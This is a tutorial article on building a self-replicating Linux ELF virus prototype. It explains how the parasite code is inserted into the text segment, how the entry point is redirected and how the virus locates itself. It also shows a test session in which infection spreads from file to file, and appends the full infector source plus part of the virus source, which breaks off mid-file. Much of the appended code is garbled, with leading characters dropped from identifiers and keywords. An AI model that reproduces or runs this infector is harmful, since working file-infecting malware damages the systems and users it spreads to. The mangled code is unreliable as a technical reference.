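I. ** Introduction
This article summarizes a Linux virus prototype I wrote recently and gives a
brief introduction for readers who are interested in the topic.
To follow it you should have some familiarity with ELF, be able to read C code
with embedded assembly, and understand the basic working principles of a virus.
II. ** ELF Infector
To produce a virus-carrying file we need an ELF infector, which creates the first
infected file. Silvio Cesare's "UNIX ELF PARASITES AND VIRUS" already gives a very
good analysis and description of ELF infection, and I have found nothing to add to
it, so I reproduce his summary of the infection process here for reference: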
The final algorithm is using this information is.
* Increase p_shoff by PAGE_SIZE in the ELF header
* Patch the insertion code (parasite) to jump to the entry point
  (original)
* Locate the text segment program header
    * Modify the entry point of the ELF header to point to the new
      code (p_vaddr + p_filesz)
    * Increase p_filesz by account for the new code (parasite)
    * Increase p_memsz to account for the new code (parasite)
* For each phdr who's segment is after the insertion (text segment)
    * increase p_offset by PAGE_SIZE
* For the last shdr in the text segment
    * increase sh_len by the parasite length
* For each shdr who's section resides after the insertion
    * Increase sh_offset by PAGE_SIZE
* Physically insert the new code (parasite) and pad to PAGE_SIZE, into
  the file - text segment p_offset + p_filesz (original)
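gei, the ELF Infector used by the Linux virus prototype, is written according to
this principle. Its source code, g-elf-infector.c, is in the appendix.
g-elf-infector is separate from the virus and is used only to create the first
infected file. A brief note on usage: g-elf-infector.c can serve any purpose that
requires inserting binary code into the text segment of a given file and having
that code run first when the target executes. Its interface is simple; you only
need to provide the following three definitions:
* The address that holds the return address of your binary code. What is needed
is the offset of this address from the start of the code; it is used to return to
the target program's normal entry point
#define PARACODE_RETADDR_ADDR_OFFSET 1232
* The binary code to insert (since it is written in C, it is supplied as a function)
void parasite_code(void);
* The end of the binary code (for convenience, a trailing function is used to compute the code length)
void parasite_code_end(void);
parasite_code_end should be the first function definition after parasite_code, and would normally look like this: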
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {}
There is one problem here: the compiler may place parasite_code_end before
parasite_code in its output, which makes the length calculation fail. To avoid
this you can write:
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {parasite_code();}
With these three definitions g-elf-infector compiles correctly, and the result can then be used on an ELF file:
~grip2@linux> ./gei foo
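III. ** How the virus prototype works
1 The ELF Infector first inserts the virus code into an ELF file. This creates the
first infected file, and subsequent propagation is carried out by that file.
2 When an infected file is executed, control first jumps to the virus code.
3 The virus code activates. In this prototype it starts propagating immediately.
4 The virus walks every file in the current directory and infects each ELF file
that meets the conditions.
5 The infection process is similar to that of the ELF Infector, but because the
working environment differs, the implementation differs considerably.
6 At present the basic requirement for infection is that the text segment has
enough spare room to hold the virus code. If it does not, the virus skips that ELF
file. An ELF file that has been infected once has no spare room left in its text
segment, so it is not infected a second time.
7 After the virus code has run, it restores the stack and all registers (this is
important), then jumps back to the real entry point of the executable, and normal
execution begins.
This description may seem formulaic, no different from the accounts of viruses we
already know. That is true: the principles are all similar, and what matters is
the implementation. Below we look at some technical problems to understand the
concrete implementation.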
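IV. ** Key technical problems and how they are handled
1 Redirecting the ELF execution flow and inserting code
For ELF infection, the ELF Infector and the infect_virus routine called during
propagation follow the same approach:
* Locate the text segment and append the virus code to its end. The key here is
familiarity with the ELF format: after copying the virus code to the end of the
text segment, adjust the length of the text segment and the file offsets of the
following segments and sections that are affected by the change. Also associate
the newly added part of the text segment with a section, so that tools such as
strip do not remove the inserted code. Finally, mind the alignment of the added
length; see the description in the ELF documentation: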
p_align
As ``Program Loading'' later in this part describes, loadable
process segments must have congruent values for p_vaddr and
p_offset, modulo the page size.
* Redirect execution by changing the entry address in the ELF header to the address of the virus code:
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
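The alignment rule quoted above can be checked with a little arithmetic. The following is only a sketch of that arithmetic, not code from the prototype: the names DEMO_PAGE_SIZE, page_align and is_congruent are made up for illustration, and a 4096-byte page is assumed, as in the PAGE_SIZE definition used elsewhere in this article.

```c
#include <stdint.h>

/* Assumed page size; the article's sources also use 4096. */
#define DEMO_PAGE_SIZE 4096u

/* Round n up to the next multiple of the page size (hypothetical helper). */
static uint32_t page_align(uint32_t n)
{
    return (n + DEMO_PAGE_SIZE - 1) & ~(DEMO_PAGE_SIZE - 1);
}

/* Return 1 when p_vaddr and p_offset are congruent modulo the page size,
 * which is what the ELF documentation requires of loadable segments. */
static int is_congruent(uint32_t p_vaddr, uint32_t p_offset)
{
    return ((p_vaddr - p_offset) % DEMO_PAGE_SIZE) == 0;
}
```

Because page_align always returns a whole number of pages, moving a segment's file offset by that amount leaves the congruence intact. That is presumably why the offsets are adjusted by the page-aligned size and not by the raw code length.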
2 How the virus code returns to the real ELF entry point
There are probably many ways to do this; the one used here is a PUSH+RET pair:
__asm__ volatile (
...
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
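Here 0xAABBCCDD is a placeholder for the real program entry address; the infecting
program fills in this value when it inserts the virus code.
3 Restoring the stack and registers
The virus code must leave the stack and register contents exactly the same after
it runs as before. This is done with some additional code.
On entry: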
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
On exit:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
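Note that the code above is tuned to a specific compiler and set of compiler
options; if the virus program is recompiled in a different environment, further
adjustment may be needed.
4 Using strings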
write(1, "hello world\n", 12);
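Referring to a string directly like this is not possible in virus code. The string
is referenced through an absolute address, and once the virus code is inside a new
host there is no guarantee about what that absolute address contains. Virus code
should therefore access strings through relative or indirect addresses.
Below is one solution from Silvio Cesare's "UNIX ELF PARASITES AND VIRUS", which
borrows a technique used when writing shellcode for buffer overflows: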
In x86 Linux, some syscalls require the use of an absolute address pointing to
initialized data. This can be made relocatable by using a common trick used
in buffer overflow code.
jmp A
B:
pop %eax ; %eax now has the address of the string
. ; continue as usual
.
.
A:
call B
.string "hello"
By making a call directly proceeding the string of interest, the address of
the string is pushed onto the stack as the return address.
When writing this Linux virus prototype, however, I did not use this method; I
tried to keep the code within C syntax:
char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};
#ifndef NDEBUG
char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
's','u','p','p','o','r','t','e','d','\n','\0'};
char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif
Here the strings appear as character arrays, and the compiled code looks like this:
...
movb $47, -8312(%ebp)
movb $116, -8311(%ebp)
movb $109, -8310(%ebp)
movb $112, -8309(%ebp)
movb $47, -8308(%ebp)
movb $46, -8307(%ebp)
movb $103, -8306(%ebp)
movb $118, -8305(%ebp)
movb $105, -8304(%ebp)
movb $114, -8303(%ebp)
movb $117, -8302(%ebp)
movb $115, -8301(%ebp)
...
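A side effect is that the code gets longer, but with moderate use the effect on
code size is small.
One thing to note: in my build environment, when a character array is declared
with a size above 64, the compiler optimizes the code and the output becomes: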
...
.section .rodata
.LC0:
.byte 47
.byte 116
.byte 109
.byte 112
.byte 47
.byte 46
.byte 103
.byte 118
.byte 105
.byte 114
.byte 117
.byte 115
.byte 0
...
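The data is placed in the .rodata section, so it cannot travel into the host
together with the virus code, and the access fails. Keep array sizes within 32
where possible to prevent this optimization.
Integer arrays can be used in a similar way and are not discussed further.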
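To see the source-level difference between a string literal and a character-array initializer, here is a small ordinary C sketch. It uses the C library and a made-up path and function name (build_demo_path), so it only demonstrates the array form itself. Whether a particular compiler emits per-byte stores or copies the data from .rodata depends on the compiler, its version and its options, as described above, so the generated assembly should be inspected and not assumed.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: builds a path from a character-array initializer,
 * the same form as tmpfile[] in the article, and copies it to out.
 * Returns the string length, or 0 if out is too small. */
static size_t build_demo_path(char *out, size_t out_len)
{
    /* The unused tail of the array is zero-filled by the initializer. */
    char path[32] = {'/','t','m','p','/','.','d','e','m','o','\0'};
    size_t n = strlen(path);

    if (n + 1 > out_len)
        return 0;
    memcpy(out, path, n + 1);
    return n;
}
```

Compiling this with gcc -S and reading the output for build_demo_path shows which of the two forms the local toolchain produces.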
5 Running into a gcc-3.3 bug
Part of the data initialization in gvirus.c looks like this:
...
char curdir[2] = {'.', 0};
char newline = '\n';
curdir[0] = '.';
curdir[1] = 0;
newline = '\n';
if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
goto out;
...
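You may wonder why curdir and newline are assigned again after they have already
been initialized. The reason is to work around a gcc bug.
In my build environment, with only the initialization
char curdir[2] = {'.', 0};
char newline = '\n';
the disassembly is as follows: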
...
0x08048cb0 <parasite_code+0>: push %ebp
0x08048cb1 <parasite_code+1>: push %edi
0x08048cb2 <parasite_code+2>: push %esi
0x08048cb3 <parasite_code+3>: push %ebx
0x08048cb4 <parasite_code+4>: sub $0x20bc,%esp
0x08048cba <parasite_code+10>: push %eax
0x08048cbb <parasite_code+11>: push %ecx
0x08048cbc <parasite_code+12>: push %edx
0x08048cbd <parasite_code+13>: xor %ecx,%ecx
0x08048cbf <parasite_code+15>: lea 0x4e(%esp),%ebx <-- uses curdir
0x08048cc3 <parasite_code+19>: mov $0x5,%eax
0x08048cc8 <parasite_code+24>: mov %ecx,%edx
0x08048cca <parasite_code+26>: int $0x80 <-- g_open system call
0x08048ccc <parasite_code+28>: mov %eax,0x38(%esp)
0x08048cd0 <parasite_code+32>: cmp $0xffffff82,%eax
0x08048cd3 <parasite_code+35>: jbe 0x8048cdd <parasite_code+45>
0x08048cd5 <parasite_code+37>: movl $0xffffffff,0x38(%esp)
0x08048cdd <parasite_code+45>: mov 0x38(%esp),%eax
0x08048ce1 <parasite_code+49>: test %eax,%eax
0x08048ce3 <parasite_code+51>: js 0x804915d <infect_start+1128>
0x08048ce9 <parasite_code+57>: movw $0x2e,0x4e(%esp) <-- initialization of curdir
...
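As the annotations show, in this case the initialization of curdir is placed after
g_open has already used it as an argument.
After adding
curdir[0] = '.';
curdir[1] = 0;
newline = '\n';
the disassembly is as follows: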
...
0x08048cb0 <parasite_code+0>: push %ebp
0x08048cb1 <parasite_code+1>: push %edi
0x08048cb2 <parasite_code+2>: push %esi
0x08048cb3 <parasite_code+3>: push %ebx
0x08048cb4 <parasite_code+4>: sub $0x20bc,%esp
0x08048cba <parasite_code+10>: push %eax
0x08048cbb <parasite_code+11>: push %ecx
0x08048cbc <parasite_code+12>: push %edx
0x08048cbd <parasite_code+13>: xor %ecx,%ecx
0x08048cbf <parasite_code+15>: movw $0x2e,0x4e(%esp) <-- initialization of curdir
0x08048cc6 <parasite_code+22>: lea 0x4e(%esp),%ebx <-- used as the argument
0x08048cca <parasite_code+26>: mov $0x5,%eax
0x08048ccf <parasite_code+31>: mov %ecx,%edx
0x08048cd1 <parasite_code+33>: int $0x80 <-- g_open system call
...
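As the annotations show, with this code added the program compiles correctly and
the compiler bug is avoided.
6 Using C and inline functions to keep the virus code readable and portable
One drawback of writing virus code in assembly is poor readability and
portability, which is a general drawback of programs written in assembly.
The body of this Linux virus prototype is written in C; only a very small part
uses gcc inline assembly, where the C language itself is too limiting. The C parts
use inline functions wherever possible, to keep the code well layered and readable.
7 How does the virus code obtain its own start address when it copies itself?
The virus code does give the ELF Infector the start address of the code, which
ensures that the code can be found and inserted into the target file when the
first infected file is created. But once the code is inside a host it cannot use
that address when propagating, because its location now depends on the host. It
has to locate its own start again.
I did not consult the code of other viruses when writing this prototype, so the
method used here may not be the best one: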
/* Get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;
... /* C code */
...
__asm__ volatile (
...
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
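A trick from buffer overflow exploits, the jmp/call pair, is used to obtain the
address of the push $0xAABBCCDD instruction. This address is one push opcode
before the address of the 0xAABBCCDD value, and the address of 0xAABBCCDD is the
location that holds the return address of the virus code. We know the offset of
that location from the start of the virus code: it is the value of the macro that
the virus code supplies to the ELF Infector interface: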
#ifndef NDEBUG
#define PARACODE_RETADDR_ADDR_OFFSET 1704
#else
#define PARACODE_RETADDR_ADDR_OFFSET 1232
#endif
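This gives the position of the virus code in the current host. (Note that after
the assembly statement, para_code_start_addr holds the address of the push
instruction, one opcode byte before the 0xAABBCCDD value; subtracting the offset
less that one byte yields the start address of the virus code):
para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;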
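8 Abandoning the C library
Because the virus code has to work inside different ELF files, every function call
it makes must be resolved within the virus body itself. Using the C library makes
that very hard. Even if some C library functions can be fully inlined (meaning the
function itself can be inlined and makes no outward calls internally), this cannot
be fundamentally guaranteed across build environments, so we have to give up the
C library.
Without the C library, the functions we use must be reimplemented. In this Linux
virus prototype there are two cases: system calls and ordinary functions.
For system calls, we rewrap them: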
static inline
g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
static inline
g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
static inline
g_syscall3(int, open, const char *, file, int, flag, int, mode);
static inline
g_syscall1(int, close, int, fd);
static inline
g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
int, flags, int, fd, off_t, offset);
static inline
g_syscall2(int, munmap, void *, addr, size_t, len);
static inline
g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
static inline
g_syscall2(int, fstat, int, filedes, struct stat *, buf);
The syscall wrapper macros were also modified, for example:
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
g__syscall_return(type,__res); \
}
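The g__syscall_return macro above relies on the convention that a raw int $0x80 result in the range -125..-1 denotes an error, while every other value is a valid result. The check can be written as a plain function to make that easier to see. This is a sketch for illustration only; the name normalize_syscall_result is invented here and does not appear in the prototype.

```c
/* Hypothetical stand-alone version of the range check in g__syscall_return.
 * Casting to unsigned long turns -125..-1 into the top 125 values of the
 * unsigned range, so one comparison covers the whole error range. */
static long normalize_syscall_result(long res)
{
    if ((unsigned long)res >= (unsigned long)(-125))
        return -1;      /* error: the macro collapses every errno to -1 */
    return res;         /* success: pass the value through unchanged */
}
```

Unlike the C library wrappers, this does not store the error code in errno, which fits the goal of keeping the code free of external data references.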
For ordinary functions, a copy of the function definition is used directly:
static inline void * __memcpy(void * to, const void * from, size_t n)
{
int d0, d1, d2;
__asm__ __volatile__(
"rep ; movsl\n\t"
"testb $2,%b4\n\t"
"je 1f\n\t"
"movsw\n"
"1:\ttestb $1,%b4\n\t"
"je 2f\n\t"
"movsb\n"
"2:"
: "=&c" (d0), "=&D" (d1), "=&S" (d2)
:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
: "memory");
return (to);
}
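9 Keeping the virus code small
To keep the virus code from growing too large, which would hinder infection, code
size has to be watched while writing it. Because the code is written in C and
function calls are inlined, every additional call increases the code size.
This applies even more to reading and writing the ELF file, where read/write would
be called frequently. To reduce the impact, the target ELF file is mapped with
mmap, so the address space is mapped directly onto the file. This removes the read
calls otherwise needed to read the target file and saves some space: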
ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
if (ehdr == MAP_FAILED) {
goto err;
}
/* Check ELF magic-ident */
if (ehdr->e_ident[EI_MAG0] != 0x7f
|| ehdr->e_ident[EI_MAG1] != 'E'
|| ehdr->e_ident[EI_MAG2] != 'L'
|| ehdr->e_ident[EI_MAG3] != 'F'
|| ehdr->e_ident[EI_CLASS] != ELFCLASS32
|| ehdr->e_ident[EI_DATA] != ELFDATA2LSB
|| ehdr->e_ident[EI_VERSION] != EV_CURRENT
|| ehdr->e_type != ET_EXEC
|| ehdr->e_machine != EM_386
|| ehdr->e_version != EV_CURRENT
) {
V_DEBUG_WRITE(1, &err_type, sizeof(err_type));
goto err;
}
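The same header test can be tried in isolation as a read-only check on a buffer. The sketch below is an ordinary user-space function, not part of the prototype: the name is_elf32_i386_exec is made up, it uses the C library and the constants from <elf.h>, and it assumes it runs on a little-endian host so that the multi-byte header fields can be compared directly.

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns 1 if buf starts with the header of a 32-bit,
 * little-endian, i386 ET_EXEC file, and 0 otherwise. It only reads buf. */
static int is_elf32_i386_exec(const void *buf, size_t len)
{
    Elf32_Ehdr eh;

    if (buf == NULL || len < sizeof eh)
        return 0;                      /* too short to hold an ELF header */
    memcpy(&eh, buf, sizeof eh);       /* avoid unaligned access to buf */

    return eh.e_ident[EI_MAG0] == ELFMAG0
        && eh.e_ident[EI_MAG1] == ELFMAG1
        && eh.e_ident[EI_MAG2] == ELFMAG2
        && eh.e_ident[EI_MAG3] == ELFMAG3
        && eh.e_ident[EI_CLASS] == ELFCLASS32
        && eh.e_ident[EI_DATA] == ELFDATA2LSB
        && eh.e_ident[EI_VERSION] == EV_CURRENT
        && eh.e_type == ET_EXEC
        && eh.e_machine == EM_386
        && eh.e_version == EV_CURRENT;
}
```

Note that position-independent executables have e_type ET_DYN, so a check of this form rejects them.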
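The code is currently all written in C, which makes it hard to trim as far as
assembly code would allow, but the size is still within a reasonable range:
1744 bytes in debug mode and 1248 bytes in standard mode.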
#ifndef NDEBUG
#define PARACODE_LENGTH 1744
#else
#define PARACODE_LENGTH 1248
#endif
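10 Inconsistent data structures
As with calls into the C library, some data types defined in the headers we use
are wrapped and differ from the ones the system calls use. The two data structures
the code depends on were extracted separately.
struct dirent {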
long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
V. ** Debugging in a new build environment
grip2@linux:~/tmp/virus> ls
g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c Makefile parasite-sample.c parasite-sample.h
Adjust the Makefile to build in debug mode, that is, turn off the -DNDEBUG option
grip2@linux:~/tmp/virus> cat Makefile
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
Build the code
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
First obtain the virus code length, then adjust the #define PARACODE_LENGTH in gvirus.c accordingly
grip2@linux:~/tmp/virus> ./gei -l <-- obtains the virus code length
Parasite code length: 1744
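Obtain the start address of the virus code and the address of 0xaabbccdd, then compute the offset of the location that holds the return address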
grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
8049427: 68 dd cc bb aa push $0xaabbccdd
grip2@linux:~/tmp/virus> objdump -d gei|grep "<parasite_code>"
08048d80 <parasite_code>:
8049450: e9 2b f9 ff ff jmp 8048d80 <parasite_code>
grip2@linux:~/tmp/virus> objdump -d gei|grep "<parasite_code>:"
08048d80 <parasite_code>:
Subtracting 0x8048d80 from 0x8049427 gives the offset we need;
use this value to update the #define PARACODE_RETADDR_ADDR_OFFSET macro in gvirus.h
Rebuild
grip2@linux:~/tmp/virus> make clean
rm *.o -rf
rm foo -rf
rm gei -rf
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
grip2@linux:~/tmp/virus> ls
gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h
Create a test directory and try it out
grip2@linux:~/tmp/virus> mkdir test
grip2@linux:~/tmp/virus> cp gei foo test
grip2@linux:~/tmp/virus> cd test
grip2@linux:~/tmp/virus/test> ls
gei foo
grip2@linux:~/tmp/virus/test> cp foo h
Create the infected program
grip2@linux:~/tmp/virus/test> ./gei h
file size: 8668
e_phoff: 00000034
e_shoff: 00001134
e_phentsize: 00000020
e_phnum: 00000008
e_shentsize: 00000028
e_shnum: 00000025
text segment file offset: 0
[15 sections patched]
grip2@linux:~/tmp/virus/test> ll
total 44
-rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo
Run the infected program
grip2@linux:~/tmp/virus/test> ./h
.
..
gei
foo
h
.backup.h
real elf point
grip2@linux:~/tmp/virus/test> ll
total 52
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
Check whether running the infected program above infected other ELF programs
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
real elf point
OK, it worked
grip2@linux:~/tmp/virus/test> cp ../foo hh
grip2@linux:~/tmp/virus/test> ll
total 64
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
hh
real elf point
grip2@linux:~/tmp/virus/test>
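VI. ** Closing
I am neither a virus coder nor an anti-virus coder, so my grasp of virus
techniques is bound to have gaps. If the description of virus techniques in this
article is inaccurate or the analysis falls short, corrections are welcome. Thank you.
VII. ** References
1 Silvio Cesare, "UNIX ELF PARASITES AND VIRUS"
2 ELF documentation
3 Further discussion of security techniques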
http://www.linuxforum.net/forum/showflat.php?Cat=&Board=security&
Number=479955&page=0&view=collapsed&sb=5&o=31&fpart=
VIII. ** Appendix - source code of the ELF infection tool and the virus prototype
------------------------------ g-elf_infector.c ------------------------------
/*
* gei - ELF Infector v0.0.2 (2004)
* written by grip2 <gript2@hotmail.com>
*/
#include <elf.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include "gvirus.h"
#define PAGE_SIZE 4096
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))
tatic int elf_infect(const char *filename,
void *para_code,
unsigned int para_code_size,
unsigned long retaddr_addr_offset);
int main(int argc, char *argv[])
{
#define MAX_FILENAME_LEN 256
char backup[MAX_FILENAME_LEN*4];
char restore[MAX_FILENAME_LEN*4];
if (argc != 2) {
fprintf(stderr,
"gei - ELF Infector v0.0.2 written by grip2 <gript2@hotmail.com>\n");
fprintf(stderr, "Usage: %s <elf-exec-file>\n", argv[0]);
return 1;
}
if (strcmp(argv[1], "-l") == 0) {
fprintf(stderr, "Parasite code length: %d\n",
amp;parasite_code_end - ¶site_code);
return 1;
}
if (strlen(argv[1]) > MAX_FILENAME_LEN) {
fprintf(stderr, "filename too long!\n");
return 1;
}
rintf(backup, "cp -f %s .backup.%s\n", argv[1], argv[1]);
rintf(restore, "cp -f .backup.%s %s\n", argv[1], argv[1]);
ystem(backup);
if (elf_infect(argv[1], ¶site_code,
amp;parasite_code_end - ¶site_code,
PARACODE_RETADDR_ADDR_OFFSET) < 0) {
ystem(restore);
return 1;
}
return 0;
}
tatic int elf_infect(const char *filename,
void *para_code,
unsigned int para_code_size,
unsigned long retaddr_addr_offset)
{
int fd = -1;
int tmp_fd = -1;
Elf32_Ehdr *ehdr = NULL;
Elf32_Phdr *phdr;
Elf32_Shdr *shdr;
int i;
int txt_index;
truct stat stat;
int align_code_size;
unsigned long org_entry;
void *new_code_pos;
int tmp_flag;
int size;
unsigned char tmp_para_code[PAGE_SIZE];
char *tmpfile;
tmpfile = tempnam(NULL, "infector");
fd = open(filename, O_RDWR);
if (fd == -1) {
error(filename);
goto err;
}
if (fstat(fd, &stat) == -1) {
error("fstat");
goto err;
}
#ifndef NDEBUG
rintf("file size: %lu\n", stat.st_size);
#endif
ehdr = mmap(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
if (ehdr == MAP_FAILED) {
error("mmap ehdr");
goto err;
}
/* Check ELF magic-ident */
if (ehdr->e_ident[EI_MAG0] != 0x7f
|| ehdr->e_ident[EI_MAG1] != 'E'
|| ehdr->e_ident[EI_MAG2] != 'L'
|| ehdr->e_ident[EI_MAG3] != 'F'
|| ehdr->e_ident[EI_CLASS] != ELFCLASS32
|| ehdr->e_ident[EI_DATA] != ELFDATA2LSB
|| ehdr->e_ident[EI_VERSION] != EV_CURRENT
|| ehdr->e_type != ET_EXEC
|| ehdr->e_machine != EM_386
|| ehdr->e_version != EV_CURRENT
) {
fprintf(stderr, "File type not supported\n");
goto err;
}
#ifndef NDEBUG
rintf("e_phoff: %08x\ne_shoff: %08x\n",
ehdr->e_phoff, ehdr->e_shoff);
rintf("e_phentsize: %08x\n", ehdr->e_phentsize);
rintf("e_phnum: %08x\n", ehdr->e_phnum);
rintf("e_shentsize: %08x\n", ehdr->e_shentsize);
rintf("e_shnum: %08x\n", ehdr->e_shnum);
#endif
align_code_size = PAGE_ALIGN(para_code_size);
/* Get program header and section header start address */
hdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
hdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);
/* Locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1) {
fprintf(stderr, "Invalid e_phnum, text segment not found.\n");
goto err;
}
if (phdr[txt_index].p_type == PT_LOAD
amp;& phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
#ifndef NDEBUG
rintf("text segment file offset: %u\n", phdr[txt_index].p_offset);
#endif
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
gt; phdr[txt_index+1].p_vaddr) {
fprintf(stderr, "Better luck next file :-)\n");
goto err;
}
reak;
}
txt_index++;
}
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
ew_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;
/* Increase the p_filesz and p_memsz of text segment
* for new code */
hdr[txt_index].p_filesz += align_code_size;
hdr[txt_index].p_memsz += align_code_size;
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
hdr[i].p_offset += align_code_size;
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
hdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
hdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
rintf("[%d sections patched]\n", i-1);
}
}
}
/* Increase p_shoff in the ELF header */
ehdr->e_shoff += align_code_size;
/* Make a new file */
tmp_fd = open(tmpfile, O_WRONLY|O_CREAT, stat.st_mode);
if (tmp_fd == -1) {
error("open");
goto err;
}
ize = new_code_pos - (void *) ehdr;
if (write(tmp_fd, ehdr, size) != size) {
error("write");
goto err;
}
memcpy(tmp_para_code, para_code, para_code_size);
memcpy(tmp_para_code + retaddr_addr_offset,
amp;org_entry, sizeof(org_entry));
if (write(tmp_fd, tmp_para_code, align_code_size) != align_code_size) {
error("write");
goto err;
}
if (write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
error("write");
goto err;
}
close(tmp_fd);
munmap(ehdr, stat.st_size);
close(fd);
if (rename(tmpfile, filename) == -1) {
error("rename");
goto err;
}
return 0;
err:
if (tmp_fd != -1)
close(tmp_fd);
if (ehdr)
munmap(ehdr, stat.st_size);
if (fd != -1)
close(fd);
return -1;
}
------------------------------ g-elf_infector.c ------------------------------
------------------------------ gvirus.h ------------------------------
#ifndef _G2_PARASITE_CODE_
#define _G2_PARASITE_CODE_
#ifndef NDEBUG
#define PARACODE_RETADDR_ADDR_OFFSET 1704
#else
#define PARACODE_RETADDR_ADDR_OFFSET 1232
#endif
void parasite_code(void);
void parasite_code_end(void);
#endif
------------------------------ gvirus.h ------------------------------
------------------------------ gvirus.c ------------------------------
/*
* virus code in C (2004)
* written by grip2 <gript2@hotmail.com>
*/
#include "gsyscall.h"
#include "gvirus.h"
#include <elf.h>
#define PAGE_SIZE 4096
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))
#ifndef NDEBUG
#define PARACODE_LENGTH 1744
#else
